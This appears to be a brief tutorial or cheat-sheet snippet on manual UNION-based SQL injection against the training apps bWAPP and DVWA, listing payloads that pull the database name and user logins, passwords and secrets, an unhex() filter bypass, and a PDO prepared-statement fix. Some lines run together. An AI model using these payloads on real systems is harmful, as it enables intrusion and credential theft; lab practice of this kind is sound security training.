Manual SQL injection exploitation using UNION statements on bWAPP and DVWA, including unhex() bypass for medium security level.
' union select 1,2,3,database(),5,6,7#
' union select 1,login,password,email,secret,6,7 FROM users#unhex(27) union select user,password FROM dvwa.users#$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$_GET['id']]);